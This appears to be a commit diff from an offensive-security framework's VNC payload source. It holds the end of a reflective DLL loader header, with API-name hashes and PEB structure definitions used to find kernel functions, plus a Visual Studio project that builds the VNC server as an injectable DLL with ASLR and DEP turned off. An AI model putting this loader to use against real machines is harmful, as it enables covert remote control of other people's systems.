// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _VNCDLL_LOADER_REFLECTIVELOADER_H
#define _VNCDLL_LOADER_REFLECTIVELOADER_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <Winsock2.h>
#include <intrin.h>
#include "ReflectiveDLLInjection.h"
#define EXITFUNC_SEH 0xEA320EFE
#define EXITFUNC_THREAD 0x0A2A1DE0
#define EXITFUNC_PROCESS 0x56A2B5F0
typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
#define KERNEL32DLL_HASH 0x6A4ABC5B
#define LOADLIBRARYA_HASH 0xEC0E4E8E
#define GETPROCADDRESS_HASH 0x7C0DFCAA
#define VIRTUALALLOC_HASH 0x91AFCA54
#define HASH_KEY 13
//===============================================================================================//
#pragma intrinsic( _rotr )
__forceinline DWORD ror( DWORD d )
{
return _rotr( d, HASH_KEY );
}
__forceinline DWORD hash( char * c )
{
register DWORD h = 0;
do
{
h = ror( h );
h += *c;
} while( *++c );
return h;
}
//===============================================================================================//
typedef struct _UNICODE_STR
{
USHORT Length;
USHORT MaximumLength;
PWSTR pBuffer;
} UNICODE_STR, *PUNICODE_STR;
// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
//__declspec( align(8) )
typedef struct _LDR_DATA_TABLE_ENTRY
{
//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STR FullDllName;
UNICODE_STR BaseDllName;
ULONG Flags;
SHORT LoadCount;
SHORT TlsIndex;
LIST_ENTRY HashTableEntry;
ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
// WinDbg> dt -v ntdll!_PEB_LDR_DATA
typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
{
DWORD dwLength;
DWORD dwInitialized;
LPVOID lpSsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
LPVOID lpEntryInProgress;
} PEB_LDR_DATA, * PPEB_LDR_DATA;
// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
{
struct _PEB_FREE_BLOCK * pNext;
DWORD dwSize;
} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
// struct _PEB is defined in Winternl.h but it is incomplete
// WinDbg> dt -v ntdll!_PEB
typedef struct __PEB // 65 elements, 0x210 bytes
{
BYTE bInheritedAddressSpace;
BYTE bReadImageFileExecOptions;
BYTE bBeingDebugged;
BYTE bSpareBool;
LPVOID lpMutant;
LPVOID lpImageBaseAddress;
PPEB_LDR_DATA pLdr;
LPVOID lpProcessParameters;
LPVOID lpSubSystemData;
LPVOID lpProcessHeap;
PRTL_CRITICAL_SECTION pFastPebLock;
LPVOID lpFastPebLockRoutine;
LPVOID lpFastPebUnlockRoutine;
DWORD dwEnvironmentUpdateCount;
LPVOID lpKernelCallbackTable;
DWORD dwSystemReserved;
DWORD dwAtlThunkSListPtr32;
PPEB_FREE_BLOCK pFreeList;
DWORD dwTlsExpansionCounter;
LPVOID lpTlsBitmap;
DWORD dwTlsBitmapBits[2];
LPVOID lpReadOnlySharedMemoryBase;
LPVOID lpReadOnlySharedMemoryHeap;
LPVOID lpReadOnlyStaticServerData;
LPVOID lpAnsiCodePageData;
LPVOID lpOemCodePageData;
LPVOID lpUnicodeCaseTableData;
DWORD dwNumberOfProcessors;
DWORD dwNtGlobalFlag;
LARGE_INTEGER liCriticalSectionTimeout;
DWORD dwHeapSegmentReserve;
DWORD dwHeapSegmentCommit;
DWORD dwHeapDeCommitTotalFreeThreshold;
DWORD dwHeapDeCommitFreeBlockThreshold;
DWORD dwNumberOfHeaps;
DWORD dwMaximumNumberOfHeaps;
LPVOID lpProcessHeaps;
LPVOID lpGdiSharedHandleTable;
LPVOID lpProcessStarterHelper;
DWORD dwGdiDCAttributeList;
LPVOID lpLoaderLock;
DWORD dwOSMajorVersion;
DWORD dwOSMinorVersion;
WORD wOSBuildNumber;
WORD wOSCSDVersion;
DWORD dwOSPlatformId;
DWORD dwImageSubsystem;
DWORD dwImageSubsystemMajorVersion;
DWORD dwImageSubsystemMinorVersion;
DWORD dwImageProcessAffinityMask;
DWORD dwGdiHandleBuffer[34];
LPVOID lpPostProcessInitRoutine;
LPVOID lpTlsExpansionBitmap;
DWORD dwTlsExpansionBitmapBits[32];
DWORD dwSessionId;
ULARGE_INTEGER liAppCompatFlags;
ULARGE_INTEGER liAppCompatFlagsUser;
LPVOID lppShimData;
LPVOID lpAppCompatInfo;
UNICODE_STR usCSDVersion;
LPVOID lpActivationContextData;
LPVOID lpProcessAssemblyStorageMap;
LPVOID lpSystemDefaultActivationContextData;
LPVOID lpSystemAssemblyStorageMap;
DWORD dwMinimumStackCommit;
} _PEB, * _PPEB;
typedef struct
{
WORD offset:12;
WORD type:4;
} IMAGE_RELOC, *PIMAGE_RELOC;
//===============================================================================================//
#endif
//===============================================================================================//

2
external/source/vncdll/winvnc/VSocket.cpp vendored Normal file → Executable file

@ -70,7 +70,7 @@ class VSocket;
////////////////////////////////////////////////////////
// *** Lovely hacks to make Win32 work. Hurrah!
#ifdef __WIN32__
#if defined(__WIN32__) && !defined(EWOULDBLOCK)
#define EWOULDBLOCK WSAEWOULDBLOCK
#endif


473
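--- a/external/source/vncdll/winvnc/WinVNC.vcxproj
+++ b/external/source/vncdll/winvnc/WinVNC.vcxproj
@@ -0,0 +1,473 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<ItemGroup Label="ProjectConfigurations">
+<ProjectConfiguration Include="Debug|Win32">
+<Configuration>Debug</Configuration>
+<Platform>Win32</Platform>
+</ProjectConfiguration>
+<ProjectConfiguration Include="Debug|x64">
+<Configuration>Debug</Configuration>
+<Platform>x64</Platform>
+</ProjectConfiguration>
+<ProjectConfiguration Include="Release|Win32">
+<Configuration>Release</Configuration>
+<Platform>Win32</Platform>
+</ProjectConfiguration>
+<ProjectConfiguration Include="Release|x64">
+<Configuration>Release</Configuration>
+<Platform>x64</Platform>
+</ProjectConfiguration>
+</ItemGroup>
+<PropertyGroup Label="Globals">
+<ProjectName>winvnc</ProjectName>
+<ProjectGuid>{EA6A09AC-04BB-423D-8842-CA48DF901058}</ProjectGuid>
+<RootNamespace>WinVNC</RootNamespace>
+<SccLocalPath>.</SccLocalPath>
+</PropertyGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+<ConfigurationType>DynamicLibrary</ConfigurationType>
+<PlatformToolset>v120_xp</PlatformToolset>
+<UseOfMfc>false</UseOfMfc>
+<CharacterSet>MultiByte</CharacterSet>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+<ConfigurationType>DynamicLibrary</ConfigurationType>
+<PlatformToolset>v120_xp</PlatformToolset>
+<UseOfMfc>false</UseOfMfc>
+<CharacterSet>MultiByte</CharacterSet>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+<ConfigurationType>DynamicLibrary</ConfigurationType>
+<PlatformToolset>v120_xp</PlatformToolset>
+<UseOfMfc>false</UseOfMfc>
+<CharacterSet>MultiByte</CharacterSet>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+<ConfigurationType>DynamicLibrary</ConfigurationType>
+<PlatformToolset>v120_xp</PlatformToolset>
+<UseOfMfc>false</UseOfMfc>
+<CharacterSet>MultiByte</CharacterSet>
+</PropertyGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+<ImportGroup Label="ExtensionSettings">
+</ImportGroup>
+<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
+</ImportGroup>
+<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
+</ImportGroup>
+<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
+</ImportGroup>
+<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
+</ImportGroup>
+<PropertyGroup Label="UserMacros" />
+<PropertyGroup>
+<_ProjectFileVersion>12.0.21005.1</_ProjectFileVersion>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
+<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
+<IgnoreImportLibrary>true</IgnoreImportLibrary>
+<LinkIncremental>false</LinkIncremental>
+<GenerateManifest>false</GenerateManifest>
+<EmbedManifest>false</EmbedManifest>
+<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+<TargetExt>.dll</TargetExt>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
+<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
+<IgnoreImportLibrary>true</IgnoreImportLibrary>
+<LinkIncremental>false</LinkIncremental>
+<GenerateManifest>false</GenerateManifest>
+<EmbedManifest>false</EmbedManifest>
+<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+<TargetExt>.dll</TargetExt>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
+<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
+<IgnoreImportLibrary>true</IgnoreImportLibrary>
+<LinkIncremental>true</LinkIncremental>
+<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+<TargetExt>.dll</TargetExt>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
+<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
+<IgnoreImportLibrary>true</IgnoreImportLibrary>
+<LinkIncremental>true</LinkIncremental>
+<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
+<TargetExt>.dll</TargetExt>
+</PropertyGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+<Midl>
+<PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<MkTypLibCompatible>true</MkTypLibCompatible>
+<SuppressStartupBanner>true</SuppressStartupBanner>
+<TargetEnvironment>Win32</TargetEnvironment>
+</Midl>
+<ClCompile>
+<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;_WINSTATIC;NCORBA;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<StringPooling>true</StringPooling>
+<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+<BufferSecurityCheck>false</BufferSecurityCheck>
+<FunctionLevelLinking>true</FunctionLevelLinking>
+<PrecompiledHeader />
+<BrowseInformation>true</BrowseInformation>
+<WarningLevel>Level3</WarningLevel>
+<SuppressStartupBanner>true</SuppressStartupBanner>
+<CompileAs>Default</CompileAs>
+</ClCompile>
+<ResourceCompile>
+<PreprocessorDefinitions>NDEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<Culture>0x0409</Culture>
+</ResourceCompile>
+<PreLinkEvent>
+<Command />
+</PreLinkEvent>
+<Link>
+<AdditionalOptions>/MACHINE:I386 %(AdditionalOptions)</AdditionalOptions>
+<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
+<SuppressStartupBanner>true</SuppressStartupBanner>
+<AdditionalManifestDependencies>type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies)</AdditionalManifestDependencies>
+<MapExports>true</MapExports>
+<SubSystem>Windows</SubSystem>
+<OptimizeReferences>true</OptimizeReferences>
+<EnableCOMDATFolding>true</EnableCOMDATFolding>
+<RandomizedBaseAddress>false</RandomizedBaseAddress>
+<DataExecutionPrevention>false</DataExecutionPrevention>
+<TargetMachine>MachineX86</TargetMachine>
+</Link>
+<PostBuildEvent>
+<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
+exit 0</Command>
+</PostBuildEvent>
+</ItemDefinitionGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+<Midl>
+<PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<MkTypLibCompatible>true</MkTypLibCompatible>
+<SuppressStartupBanner>true</SuppressStartupBanner>
+<TargetEnvironment>X64</TargetEnvironment>
+<GenerateTypeLibrary>false</GenerateTypeLibrary>
+<HeaderFileName />
+<DllDataFileName />
+</Midl>
+<ClCompile>
+<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;__WIN32__;__NT__;__x64__;_WINSTATIC;NCORBA;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<StringPooling>true</StringPooling>
+<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+<BufferSecurityCheck>false</BufferSecurityCheck>
+<FunctionLevelLinking>true</FunctionLevelLinking>
+<PrecompiledHeader />
+<BrowseInformation>true</BrowseInformation>
+<WarningLevel>Level3</WarningLevel>
+<SuppressStartupBanner>true</SuppressStartupBanner>
+<CompileAs>Default</CompileAs>
+</ClCompile>
+<ResourceCompile>
+<PreprocessorDefinitions>NDEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<Culture>0x0409</Culture>
+</ResourceCompile>
+<PreLinkEvent>
+<Command />
+</PreLinkEvent>
+<Link>
+<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
+<SuppressStartupBanner>false</SuppressStartupBanner>
+<ManifestFile />
+<MapExports>false</MapExports>
+<SubSystem>Windows</SubSystem>
+<OptimizeReferences>true</OptimizeReferences>
+<EnableCOMDATFolding>true</EnableCOMDATFolding>
+<RandomizedBaseAddress />
+<DataExecutionPrevention />
+<TargetMachine>NotSet</TargetMachine>
+<AllowIsolation>true</AllowIsolation>
+</Link>
+<PostBuildEvent>
+<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" &gt; NUL
+exit 0</Command>
+</PostBuildEvent>
+</ItemDefinitionGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+<Midl>
+<PreprocessorDefinitions>_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<MkTypLibCompatible>true</MkTypLibCompatible>
+<SuppressStartupBanner>true</SuppressStartupBanner>
+<TargetEnvironment>Win32</TargetEnvironment>
+</Midl>
+<ClCompile>
+<Optimization>Disabled</Optimization>
+<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;NCORBA;_WINSTATIC;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<BasicRuntimeChecks>StackFrameRuntimeCheck</BasicRuntimeChecks>
+<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
+<BufferSecurityCheck>true</BufferSecurityCheck>
+<PrecompiledHeader />
+<WarningLevel>Level3</WarningLevel>
+<SuppressStartupBanner>true</SuppressStartupBanner>
+<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+<CompileAs>Default</CompileAs>
+</ClCompile>
+<ResourceCompile>
+<PreprocessorDefinitions>_DEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<Culture>0x0809</Culture>
+</ResourceCompile>
+<Link>
+<AdditionalOptions>/MACHINE:I386 %(AdditionalOptions)</AdditionalOptions>
+<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+<SuppressStartupBanner>true</SuppressStartupBanner>
+<AdditionalManifestDependencies>type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies)</AdditionalManifestDependencies>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+<SubSystem>Windows</SubSystem>
+<RandomizedBaseAddress>false</RandomizedBaseAddress>
+<DataExecutionPrevention />
+<TargetMachine>MachineX86</TargetMachine>
+</Link>
+<PostBuildEvent>
+<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
+exit 0</Command>
+</PostBuildEvent>
+</ItemDefinitionGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+<Midl>
+<PreprocessorDefinitions>_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<MkTypLibCompatible>true</MkTypLibCompatible>
+<SuppressStartupBanner>true</SuppressStartupBanner>
+<TargetEnvironment>X64</TargetEnvironment>
+</Midl>
+<ClCompile>
+<Optimization>Disabled</Optimization>
+<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;NCORBA;_WINSTATIC;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<BasicRuntimeChecks>StackFrameRuntimeCheck</BasicRuntimeChecks>
+<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
+<BufferSecurityCheck>true</BufferSecurityCheck>
+<PrecompiledHeader />
+<WarningLevel>Level3</WarningLevel>
+<SuppressStartupBanner>true</SuppressStartupBanner>
+<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+<CompileAs>Default</CompileAs>
+</ClCompile>
+<ResourceCompile>
+<PreprocessorDefinitions>_DEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+<Culture>0x0809</Culture>
+</ResourceCompile>
+<Link>
+<AdditionalOptions>/MACHINE:I386 %(AdditionalOptions)</AdditionalOptions>
+<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
+<SuppressStartupBanner>true</SuppressStartupBanner>
+<AdditionalManifestDependencies>type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies)</AdditionalManifestDependencies>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+<SubSystem>Windows</SubSystem>
+<RandomizedBaseAddress>false</RandomizedBaseAddress>
+<DataExecutionPrevention />
+<TargetMachine>MachineX64</TargetMachine>
+</Link>
+<PostBuildEvent>
+<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" &gt; NUL
+exit 0</Command>
+</PostBuildEvent>
+</ItemDefinitionGroup>
+<ItemGroup>
+<ClCompile Include="vncdll.cpp" />
+<ClCompile Include="vncEncodeCoRRE.cpp" />
+<ClCompile Include="vncEncodeHexT.cpp" />
+<ClCompile Include="vncEncoder.cpp" />
+<ClCompile Include="vncEncodeRRE.cpp" />
+<ClCompile Include="vncEncodeTight.cpp" />
+<ClCompile Include="vncEncodeZlib.cpp" />
+<ClCompile Include="vncEncodeZlibHex.cpp" />
+<ClCompile Include="omnithread\nt.cpp" />
+<ClCompile Include="libjpeg\jcapimin.c" />
+<ClCompile Include="libjpeg\jcapistd.c" />
+<ClCompile Include="libjpeg\jccoefct.c" />
+<ClCompile Include="libjpeg\jccolor.c" />
+<ClCompile Include="libjpeg\jcdctmgr.c" />
+<ClCompile Include="libjpeg\jchuff.c" />
+<ClCompile Include="libjpeg\jcinit.c" />
+<ClCompile Include="libjpeg\jcmainct.c" />
+<ClCompile Include="libjpeg\jcmarker.c" />
+<ClCompile Include="libjpeg\jcmaster.c" />
+<ClCompile Include="libjpeg\jcomapi.c" />
+<ClCompile Include="libjpeg\jcparam.c" />
+<ClCompile Include="libjpeg\jcphuff.c" />
+<ClCompile Include="libjpeg\jcprepct.c" />
+<ClCompile Include="libjpeg\jcsample.c" />
+<ClCompile Include="libjpeg\jctrans.c" />
+<ClCompile Include="libjpeg\jdapimin.c" />
+<ClCompile Include="libjpeg\jdapistd.c" />
+<ClCompile Include="libjpeg\jdatadst.c" />
+<ClCompile Include="libjpeg\jdatasrc.c" />
+<ClCompile Include="libjpeg\jdcoefct.c" />
+<ClCompile Include="libjpeg\jdcolor.c" />
+<ClCompile Include="libjpeg\jddctmgr.c" />
+<ClCompile Include="libjpeg\jdhuff.c" />
+<ClCompile Include="libjpeg\jdinput.c" />
+<ClCompile Include="libjpeg\jdmainct.c" />
+<ClCompile Include="libjpeg\jdmarker.c" />
+<ClCompile Include="libjpeg\jdmaster.c" />
+<ClCompile Include="libjpeg\jdmerge.c" />
+<ClCompile Include="libjpeg\jdphuff.c" />
+<ClCompile Include="libjpeg\jdpostct.c" />
+<ClCompile Include="libjpeg\jdsample.c" />
+<ClCompile Include="libjpeg\jdtrans.c" />
+<ClCompile Include="libjpeg\jerror.c" />
+<ClCompile Include="libjpeg\jfdctflt.c" />
+<ClCompile Include="libjpeg\jfdctfst.c" />
+<ClCompile Include="libjpeg\jfdctint.c" />
+<ClCompile Include="libjpeg\jidctflt.c" />
+<ClCompile Include="libjpeg\jidctfst.c" />
+<ClCompile Include="libjpeg\jidctint.c" />
+<ClCompile Include="libjpeg\jidctred.c" />
+<ClCompile Include="libjpeg\jmemmgr.c" />
+<ClCompile Include="libjpeg\jmemnobs.c" />
+<ClCompile Include="libjpeg\jquant1.c" />
+<ClCompile Include="libjpeg\jquant2.c" />
+<ClCompile Include="libjpeg\jutils.c" />
+<ClCompile Include="zlib\adler32.c" />
+<ClCompile Include="zlib\compress.c" />
+<ClCompile Include="zlib\crc32.c" />
+<ClCompile Include="zlib\deflate.c" />
+<ClCompile Include="zlib\infblock.c" />
+<ClCompile Include="zlib\infcodes.c" />
+<ClCompile Include="zlib\inffast.c" />
+<ClCompile Include="zlib\inflate.c" />
+<ClCompile Include="zlib\inftrees.c" />
+<ClCompile Include="zlib\infutil.c" />
+<ClCompile Include="zlib\maketree.c" />
+<ClCompile Include="zlib\trees.c" />
+<ClCompile Include="zlib\uncompr.c" />
+<ClCompile Include="zlib\zutil.c" />
+<ClCompile Include="d3des.c" />
+<ClCompile Include="DynamicFn.cpp" />
+<ClCompile Include="FileTransferItemInfo.cpp" />
+<ClCompile Include="MinMax.cpp" />
+<ClCompile Include="RectList.cpp" />
+<ClCompile Include="stdhdrs.cpp" />
+<ClCompile Include="tableinitcmtemplate.cpp">
+<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
+<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
+<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
+<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
+</ClCompile>
+<ClCompile Include="tableinittctemplate.cpp">
+<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
+<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
+<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
+<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
+</ClCompile>
+<ClCompile Include="tabletranstemplate.cpp">
+<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
+<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
+<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
+<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
+</ClCompile>
+<ClCompile Include="translate.cpp" />
+<ClCompile Include="TsSessions.cpp" />
+<ClCompile Include="VideoDriver.cpp" />
+<ClCompile Include="vncauth.c" />
+<ClCompile Include="vncBuffer.cpp" />
+<ClCompile Include="vncClient.cpp" />
+<ClCompile Include="vncDesktop.cpp" />
+<ClCompile Include="vncInstHandler.cpp" />
+<ClCompile Include="vncKeymap.cpp" />
+<ClCompile Include="vncRegion.cpp" />
+<ClCompile Include="vncServer.cpp" />
+<ClCompile Include="vncService.cpp" />
+<ClCompile Include="vncSockConnect.cpp" />
+<ClCompile Include="VSocket.cpp" />
+<ClCompile Include="WallpaperUtils.cpp" />
+</ItemGroup>
+<ItemGroup>
+<ClInclude Include="omnithread\nt.h" />
+<ClInclude Include="omnithread\omnithread.h" />
+<ClInclude Include="common.h" />
+<ClInclude Include="libjpeg\jchuff.h" />
+<ClInclude Include="libjpeg\jconfig.h" />
+<ClInclude Include="libjpeg\jdct.h" />
+<ClInclude Include="libjpeg\jdhuff.h" />
+<ClInclude Include="libjpeg\jerror.h" />
+<ClInclude Include="libjpeg\jinclude.h" />
+<ClInclude Include="libjpeg\jmemsys.h" />
+<ClInclude Include="libjpeg\jmorecfg.h" />
+<ClInclude Include="libjpeg\jpegint.h" />
+<ClInclude Include="libjpeg\jpeglib.h" />
+<ClInclude Include="libjpeg\jversion.h" />
+<ClInclude Include="zlib\deflate.h" />
+<ClInclude Include="zlib\infblock.h" />
+<ClInclude Include="zlib\infcodes.h" />
+<ClInclude Include="zlib\inffast.h" />
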